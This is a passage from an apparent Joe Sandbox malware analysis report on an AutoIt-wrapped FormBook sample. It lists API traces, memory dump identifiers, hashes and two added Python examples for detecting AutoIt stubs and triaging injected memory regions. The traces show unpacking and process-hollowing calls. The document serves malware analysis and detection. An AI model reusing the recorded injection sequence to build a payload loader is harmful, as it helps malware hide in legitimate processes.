• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
• String ID: TaskbarCreated$%O
• API String ID: 129472671-2925486391
• Opcode ID: 4acb1d505d560bab02e3a9f8ee01aa4d1539c500b95a253a5a1bf89eb90e3368
• Instruction ID: 8c4176bd27aab08223f93bc62c3aea11181a9ab856c2b5fc35091fbb21911561
• Opcode Fuzzy Hash: 4acb1d505d560bab02e3a9f8ee01aa4d1539c500b95a253a5a1bf89eb90e3368
• Instruction Fuzzy Hash: 124119B12001C5ABDF305F68EC49B7A3B95EF15302F14013BF902963A2EA7C9D06926F

APIs
• GetSysColorBrush.USER32(0000000F), ref: 00463A62
• LoadCursorW.USER32(00000000,00007F00), ref: 00463A71
• LoadIconW.USER32(00000063), ref: 00463A88
• LoadIconW.USER32(000000A4), ref: 00463A9A
• LoadIconW.USER32(000000A2), ref: 00463AAC
• LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00463AD2
• RegisterClassExW.USER32(?), ref: 00463B28
  • Part of subcall function 00463041: GetSysColorBrush.USER32(0000000F), ref: 00463074
  • Part of subcall function 00463041: RegisterClassExW.USER32(00000030), ref: 0046309E
  • Part of subcall function 00463041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004630AF
  • Part of subcall function 00463041: InitCommonControlsEx.COMCTL32(?), ref: 004630CC
  • Part of subcall function 00463041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004630DC
  • Part of subcall function 00463041: LoadIconW.USER32(000000A9), ref: 004630F2
  • Part of subcall function 00463041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00463101
Strings
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
• String ID: #$0$AutoIt v3
• API String ID: 423443420-4155596026
• Opcode ID: 73e8439e6fe8c97233bda814c019d4be9c3c19a10ca002c5361603f527582d4c
• Instruction ID: dea98ce677f18b7a986c859cef40fd98676a7846589bb3099a84f0cd65bb75d1
• Opcode Fuzzy Hash: 73e8439e6fe8c97233bda814c019d4be9c3c19a10ca002c5361603f527582d4c
• Instruction Fuzzy Hash: CC218D75D00344EFEB219FA4EC49B9D7BB0FB19711F00412AF500A62A1D3B95649AF89

Strings
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
• String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$bR
• API String ID: 1825951767-3489610151
• Opcode ID: 027761bb90c4d79256bc2e977bb4db94ed3ded4538bd0f688152333c144d5a6f
• Instruction ID: 631a700e56bf40238321bbf3ed9abdd2fd1ad6892c99d0999e91ae0751235e98
• Opcode Fuzzy Hash: 027761bb90c4d79256bc2e977bb4db94ed3ded4538bd0f688152333c144d5a6f
• Instruction Fuzzy Hash: AEA181719102699ACF04EFA2CC91EEEB778BF14305F10052FF412A7191EF785A09CB6A

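The registry path queried by the RegQueryValueExW routine above (Software\AutoIt v3\AutoIt, value Include), the AutoIt v3 window class registered by the RegisterClassExW routine, and the /AutoIt3ExecuteLine, /AutoIt3ExecuteScript, /AutoIt3OutputDebug, /ErrorStdOut, >>>AUTOIT NO CMDEXECUTE<<< and CMDLINE/CMDLINERAW strings in the command-line parser are all artefacts of the AutoIt3 interpreter, not of FormBook itself; they are what the "Binary is likely a compiled AutoIt script file" signature keys on. The scanner below is an added example, not code from the Joe Sandbox report or from AutoIt. It checks a file for those markers in both UTF-16LE (the W-suffixed APIs and _wcsicmp indicate wide strings) and ASCII, and calls the file a probable compiled AutoIt stub when at least three distinct markers are present. The marker list and the threshold are the example's own choices, and the two sample buffers are constructed inline rather than taken from the sample.

```python
"""Flag a file as a probable compiled AutoIt v3 stub from the runtime strings
listed in this report. Example code, not part of the report or of AutoIt."""
import sys

# Marker strings taken from the String IDs of the routines above. None of
# these belongs to the FormBook payload; they identify the AutoIt3 interpreter
# that the payload is wrapped in.
AUTOIT_MARKERS = (
    "AutoIt v3",                    # window class name
    "Software\\AutoIt v3\\AutoIt",  # registry key queried for 'Include'
    "/AutoIt3ExecuteLine",
    "/AutoIt3ExecuteScript",
    "/AutoIt3OutputDebug",
    "/ErrorStdOut",
    ">>>AUTOIT NO CMDEXECUTE<<<",
    "CMDLINERAW",
)

# Threshold chosen for this example: a single hit could come from an unrelated
# program that merely mentions AutoIt, three independent markers will not.
MIN_MARKERS = 3


def find_autoit_markers(data: bytes) -> dict[str, list[str]]:
    """Return {marker: [encodings in which it occurs]} for markers present in data.

    Both encodings are tried because the interpreter handles these strings as
    wide characters (W-suffixed APIs, _wcsicmp), while re-packed copies or
    resource data may carry them as ASCII.
    """
    hits: dict[str, list[str]] = {}
    for marker in AUTOIT_MARKERS:
        encodings = [
            name for name, enc in (("utf-16le", "utf-16-le"), ("ascii", "ascii"))
            if marker.encode(enc) in data
        ]
        if encodings:
            hits[marker] = encodings
    return hits


def is_likely_compiled_autoit(data: bytes) -> bool:
    """True when at least MIN_MARKERS distinct markers are present."""
    return len(find_autoit_markers(data)) >= MIN_MARKERS


def scan_file(path: str) -> dict[str, list[str]]:
    """Read a file and return its marker hits (whole file in memory, fine for stubs)."""
    with open(path, "rb") as fh:
        return find_autoit_markers(fh.read())


# Constructed stand-in for a compiled AutoIt stub: a fake header, filler bytes,
# four markers as UTF-16LE and one as ASCII. Not real sample data.
CONSTRUCTED_STUB = (
    b"MZ" + b"\x00" * 62 + b"PE\x00\x00" + bytes(range(256))
    + "AutoIt v3".encode("utf-16-le") + b"\x00\x00"
    + "Software\\AutoIt v3\\AutoIt".encode("utf-16-le") + b"\x00\x00"
    + "/AutoIt3ExecuteScript".encode("utf-16-le") + b"\x00\x00"
    + ">>>AUTOIT NO CMDEXECUTE<<<".encode("utf-16-le") + b"\x00\x00"
    + b"CMDLINERAW\x00"
)
# Constructed benign buffer: mentions AutoIt once, which must not be enough.
CONSTRUCTED_BENIGN = b"MZ" + b"\x00" * 62 + b"uninstaller for AutoIt v3 helper\x00"

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else None
    found = scan_file(target) if target else find_autoit_markers(CONSTRUCTED_STUB)
    for marker, encodings in found.items():
        print(f"{marker!r}: {', '.join(encodings)}")
    print("likely compiled AutoIt:", len(found) >= MIN_MARKERS)
```

Run it with a path to scan a real file; with no argument it scans the constructed stub. A positive result only says the binary is an AutoIt stub, which is the wrapper here, not the payload; the payload has to be recovered from the script resource or from the memory dumps.
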
APIs
  • Part of subcall function 004803A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 004803D3 (VK_LWIN, MAPVK_VK_TO_VSC)
  • Part of subcall function 004803A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 004803DB (VK_SHIFT)
  • Part of subcall function 004803A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 004803E6 (VK_LSHIFT)
  • Part of subcall function 004803A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 004803F1 (VK_RSHIFT)
  • Part of subcall function 004803A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 004803F9 (VK_CONTROL)
  • Part of subcall function 004803A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00480401 (VK_MENU, i.e. Alt)
  • Part of subcall function 00476259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0046FA90), ref: 004762B4
• GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0046FB2D
• OleInitialize.OLE32(00000000), ref: 0046FBAA
• CloseHandle.KERNEL32(00000000), ref: 004A49F2
Strings
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
• String ID: <gR$\dR$%O$cR
• API String ID: 1986988660-2087634799
• Opcode ID: a3c74f3d1c55f23d1aeacc5509739788249b2136e0d2033a672db52c13533b40
• Instruction ID: a3d5108bffa0501100433a59dc6c5af6b147bcb45f31bf2c810d7694d0e8ecf5
• Opcode Fuzzy Hash: a3c74f3d1c55f23d1aeacc5509739788249b2136e0d2033a672db52c13533b40
• Instruction Fuzzy Hash: 5681DDB0901290CECBA4EF2AF9906157BE4FF7A308754857ED088C7262EB35550EEF95
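
Every function entry in this section carries the memory-dump identifier it was lifted from, and that identifier is what separates the AutoIt stub from the code that was unpacked at runtime: the 00460000 module dumps above decode to image-backed read-only or read-execute regions, while the 010FB000 dump that follows is an executable, writable, private allocation ("based on PE: false"). The parser below is an added example, not Joe Sandbox code. The field order is inferred from the identifiers on this page: fields 4, 5 and 7 decode consistently to base address, page protection and region type using the standard winnt.h constants for the .text, .rdata, .data and injected regions; the remaining fields are carried through without interpretation because the example does not know their meaning. The identifiers are those printed in this report, and the triage rule (executable and not image-backed) is the example's own.

```python
"""Decode Joe Sandbox memory-dump identifiers (the *.sdmp names in this report)
and flag the regions worth unpacking. Example code, not part of Joe Sandbox."""
from dataclasses import dataclass
import re

# Standard winnt.h values. Only the low byte of the protection field is a base
# protection; PAGE_GUARD (0x100) and similar bits are modifiers and are masked off.
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTABLE = {0x10, 0x20, 0x40, 0x80}
REGION_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# Eight dot-separated hex fields before ".sdmp". Fields 4, 5 and 7 (base
# address, protection, region type) are inferred from this report; the others
# are kept uninterpreted. This layout is an assumption of the example.
_ID_RE = re.compile(r"^((?:[0-9A-Fa-f]+\.){7}[0-9A-Fa-f]+)\.sdmp")


@dataclass(frozen=True)
class DumpId:
    raw: str
    fields: tuple[int, ...]

    @property
    def base(self) -> int:
        return self.fields[3]

    @property
    def protect(self) -> int:
        return self.fields[4] & 0xFF

    @property
    def region_type(self) -> int:
        return self.fields[6]

    @property
    def protect_name(self) -> str:
        return PAGE_PROTECTION.get(self.protect, f"unknown(0x{self.fields[4]:x})")

    @property
    def type_name(self) -> str:
        return REGION_TYPE.get(self.region_type, f"unknown(0x{self.region_type:x})")


def parse_dump_id(name: str) -> DumpId:
    """Parse a dump name; trailing page residue such as 'Download File' is ignored."""
    m = _ID_RE.match(name.strip())
    if not m:
        raise ValueError(f"not a dump identifier: {name!r}")
    return DumpId(raw=m.group(0),
                  fields=tuple(int(f, 16) for f in m.group(1).split(".")))


def is_injected_code_candidate(d: DumpId) -> bool:
    """Executable memory that is not backed by a mapped image: where unpacked
    payloads and hollowed-in code live. Rule chosen for this example."""
    return d.protect in EXECUTABLE and d.region_type != 0x1000000


def triage(names: list[str]) -> list[str]:
    """Return 'base protection type' lines for the candidates, lowest base first."""
    parsed = sorted((parse_dump_id(n) for n in names), key=lambda d: d.base)
    return [f"{d.base:08X} {d.protect_name} {d.type_name}"
            for d in parsed if is_injected_code_candidate(d)]


# Identifiers copied from the Memory Dump Source blocks of this report, one of
# them with the page's 'Download File' residue still attached.
REPORT_DUMPS = [
    "00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File",
    "00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2042218501.00000000010FB000.00000040.00000020.00020000.00000000.sdmp",
]

if __name__ == "__main__":
    for line in triage(REPORT_DUMPS):
        print(line)
```

On this report the only candidate is the 010FB000 region (PAGE_EXECUTE_READWRITE, MEM_PRIVATE), which is the dump to carve for the next stage; the module's own .text section is excluded because it is image-backed and merely read-execute.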

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 993 10fdc80-10fdd2e call 10fb6d0 996 10fdd35-10fdd5b call 10feb90 CreateFileW 993->996 999 10fdd5d 996->999 1000 10fdd62-10fdd72 996->1000 1001 10fdead-10fdeb1 999->1001 1007 10fdd79-10fdd93 VirtualAlloc 1000->1007 1008 10fdd74 1000->1008 1003 10fdef3-10fdef6 1001->1003 1004 10fdeb3-10fdeb7 1001->1004 1009 10fdef9-10fdf00 1003->1009 1005 10fdeb9-10fdebc 1004->1005 1006 10fdec3-10fdec7 1004->1006 1005->1006 1010 10fdec9-10fded3 1006->1010 1011 10fded7-10fdedb 1006->1011 1012 10fdd9a-10fddb1 ReadFile 1007->1012 1013 10fdd95 1007->1013 1008->1001 1014 10fdf55-10fdf6a 1009->1014 1015 10fdf02-10fdf0d 1009->1015 1010->1011 1018 10fdedd-10fdee7 1011->1018 1019 10fdeeb 1011->1019 1020 10fddb8-10fddf8 VirtualAlloc 1012->1020 1021 10fddb3 1012->1021 1013->1001 1016 10fdf6c-10fdf77 VirtualFree 1014->1016 1017 10fdf7a-10fdf82 1014->1017 1022 10fdf0f 1015->1022 1023 10fdf11-10fdf1d 1015->1023 1016->1017 1018->1019 1019->1003 1024 10fddff-10fde1a call 10fede0 1020->1024 1025 10fddfa 1020->1025 1021->1001 1022->1014 1026 10fdf1f-10fdf2f 1023->1026 1027 10fdf31-10fdf3d 1023->1027 1033 10fde25-10fde2f 1024->1033 1025->1001 1028 10fdf53 1026->1028 1029 10fdf3f-10fdf48 1027->1029 1030 10fdf4a-10fdf50 1027->1030 1028->1009 1029->1028 1030->1028 1034 10fde62-10fde76 call 10febf0 1033->1034 1035 10fde31-10fde60 call 10fede0 1033->1035 1041 10fde7a-10fde7e 1034->1041 1042 10fde78 1034->1042 1035->1033 1043 10fde8a-10fde8e 1041->1043 1044 10fde80-10fde84 CloseHandle 1041->1044 1042->1001 1045 10fde9e-10fdea7 1043->1045 1046 10fde90-10fde9b VirtualFree 1043->1046 1044->1043 1045->996 1045->1001 1046->1045
APIs
• CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 010FDD51
• VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 010FDF77
Memory Dump Source
• Source File: 00000000.00000002.2042218501.00000000010FB000.00000040.00000020.00020000.00000000.sdmp, Offset: 010FB000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10fb000_PI916810.jbxd
Similarity
• API ID: CreateFileFreeVirtual
• String ID:
• API String ID: 204039940-0
• Opcode ID: e7fcc9d0c03c8eebee60ddba528add67e317e316073a556d8272a5bdc8b54fa5
• Instruction ID: 33ba037334078ea6e47944db3adddbd8fb152ef98825165cfc938ef8383b063e
• Opcode Fuzzy Hash: e7fcc9d0c03c8eebee60ddba528add67e317e316073a556d8272a5bdc8b54fa5
• Instruction Fuzzy Hash: B2A11570E00209EBDB14DFE8C895BEEBBB5FF48304F208599E245BB680D7759A41CB94

Control-flow Graph
control_flow_graph 1114 4639e7-463a57 CreateWindowExW * 2 ShowWindow * 2
APIs
• CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00463A15
• CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00463A36
• ShowWindow.USER32(00000000,?,?), ref: 00463A4A
• ShowWindow.USER32(00000000,?,?), ref: 00463A53
Strings
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: Window$CreateShow
• String ID: AutoIt v3$edit
• API String ID: 1584632944-3779509399
• Opcode ID: d774fa63a2684956aa1de2d6c58692a75f9da2e3fa18a2469adbc4e140fde4f9
• Instruction ID: 49fabe89dfa02a3cd5ce33057578fcd04e40f17214c3d746373fa82a1f002b04
• Opcode Fuzzy Hash: d774fa63a2684956aa1de2d6c58692a75f9da2e3fa18a2469adbc4e140fde4f9
• Instruction Fuzzy Hash: C5F03A78600290FEEA3117236C48E372E7DDBD7F50B00413AB900A6170C2B50C4AEAB4

Control-flow Graph

APIs
  • Part of subcall function 010FD970: Sleep.KERNELBASE(000001F4), ref: 010FD981
• CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 010FDB73
Strings
Memory Dump Source
• Source File: 00000000.00000002.2042218501.00000000010FB000.00000040.00000020.00020000.00000000.sdmp, Offset: 010FB000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10fb000_PI916810.jbxd
Similarity
• API ID: CreateFileSleep
• String ID: X3D7XSTUJYMZSX45N0
• API String ID: 2694422964-1082446581
• Opcode ID: 7ae9787d4629b6e0318a93b1dfd9fdb3f8646c8857a2041a0108029d2cbb54b7
• Instruction ID: 5eb3968ca9b0b64e866a83aabd6d02f9fa1a338e22ac18d43d52798513cb7230
• Opcode Fuzzy Hash: 7ae9787d4629b6e0318a93b1dfd9fdb3f8646c8857a2041a0108029d2cbb54b7
• Instruction Fuzzy Hash: 9B516131D0424DDAEF11DBE4CC19BEEBBB8AF55304F004199E658BB2C0D6B91B49CBA5

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
• String ID:
• API String ID: 1559183368-0
• Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
• Instruction ID: 4bb451d7578c0cc73bf1ba3fac110d1155c9a2306c1bae792b4449d6cadff031
• Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
• Instruction Fuzzy Hash: 7851B530A00B05DBDB24AF79C88466F77B1AF40324F64CB2FF829962D0E7789D519B49
APIs
  • Part of subcall function 00464F3D: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,005262F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00464F6F
• _free.LIBCMT ref: 0049E68C
• _free.LIBCMT ref: 0049E6D3
  • Part of subcall function 00466BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00466D0D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: _free$CurrentDirectoryLibraryLoad
• String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
• API String ID: 2861923089-1757145024
• Opcode ID: ac3171d247a727c3f1aada62d91da4198bcd733f496c89d66fd8c94732b2b29c
• Instruction ID: cbb2b1bdbc241d0bb7c350f7e38f8fb86e318ac2a14aee2966bd4980c79acdac
• Opcode Fuzzy Hash: ac3171d247a727c3f1aada62d91da4198bcd733f496c89d66fd8c94732b2b29c
• Instruction Fuzzy Hash: F5916F71910219EFCF04EFA6CC919EDBBB4BF15318F14442FE815AB291EB38A905CB59
APIs
• RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,004635A1,SwapMouseButtons,00000004,?), ref: 004635D4
• RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,004635A1,SwapMouseButtons,00000004,?,?,?,?,00462754), ref: 004635F5
• RegCloseKey.KERNELBASE(00000000,?,?,004635A1,SwapMouseButtons,00000004,?,?,?,?,00462754), ref: 00463617
Strings
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID: Control Panel\Mouse
• API String ID: 3677997916-824357125
• Opcode ID: ecea770bfdaa7d2c7e814dd0f94a1b571b02000fbd1129c9d05368ef14f633d9
• Instruction ID: 80c436725155f16245ee778f61b4ef95944c823f368955214ab9e54224ec0470
• Opcode Fuzzy Hash: ecea770bfdaa7d2c7e814dd0f94a1b571b02000fbd1129c9d05368ef14f633d9
• Instruction Fuzzy Hash: B7115A71510258BFDB20CF64DC80DAFB7B8EF05741F00456AF805DB210E2719F449769
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 010FD12B
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 010FD1C1
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 010FD1E3
Memory Dump Source
• Source File: 00000000.00000002.2042218501.00000000010FB000.00000040.00000020.00020000.00000000.sdmp, Offset: 010FB000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10fb000_PI916810.jbxd
Similarity
• API ID: Process$ContextCreateMemoryReadThreadWow64
• String ID:
• API String ID: 2438371351-0
• Opcode ID: f7a3111ab7015fd8b62422fe8fc399687c9bf18e9b49b2a513bdf356eeec8a8c
• Instruction ID: 4b1acb27b6ffbbd558985ad8ef175e7c5d208b8290fa8a33a301851d368a3a98
• Instruction Fuzzy Hash: 52621C30A14258DBEB24CFA4C841BDEB772EF58300F1091A9D24DEB794E7799E81CB59
APIs
  • Part of subcall function 00465045: _fseek.LIBCMT ref: 0046505D
  • Part of subcall function 004C99BE: _wcscmp.LIBCMT ref: 004C9AAE
  • Part of subcall function 004C99BE: _wcscmp.LIBCMT ref: 004C9AC1
• _free.LIBCMT ref: 004C992C
• _free.LIBCMT ref: 004C9933
• _free.LIBCMT ref: 004C999E
  • Part of subcall function 00482F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00489C64), ref: 00482FA9
  • Part of subcall function 00482F95: GetLastError.KERNEL32(00000000,?,00489C64), ref: 00482FBB
• _free.LIBCMT ref: 004C99A6
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
• String ID:
• API String ID: 1552873950-0
• Opcode ID: 922d4df5b64e1696f8af207ae7c752e1e6b30532c460fe4269bae0bb53f03174
• Instruction ID: 0729db0d97bbb50b6f8a1ac599990ff3053ca13b69932034d19d6d09209a3abc
• Instruction Fuzzy Hash: AC515CB5A04218AFDF249F65CC85A9EBBB9EF48304F0004AEB609A7241DB755E80CF59
APIs
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: __flsbuf__flush__getptd_noexit__write_memmove
• String ID:
• API String ID: 2782032738-0
• Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
• Instruction ID: 39bea72cd495b48ab28e4bfa21d1c12dc7ede143a45b3e8b19d5178e56e04c37
• Instruction Fuzzy Hash: 9B41C5B0A006079BDB2CEEB9C88096F77A9EFC1364B24896FE8558B740D7789D41874C
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
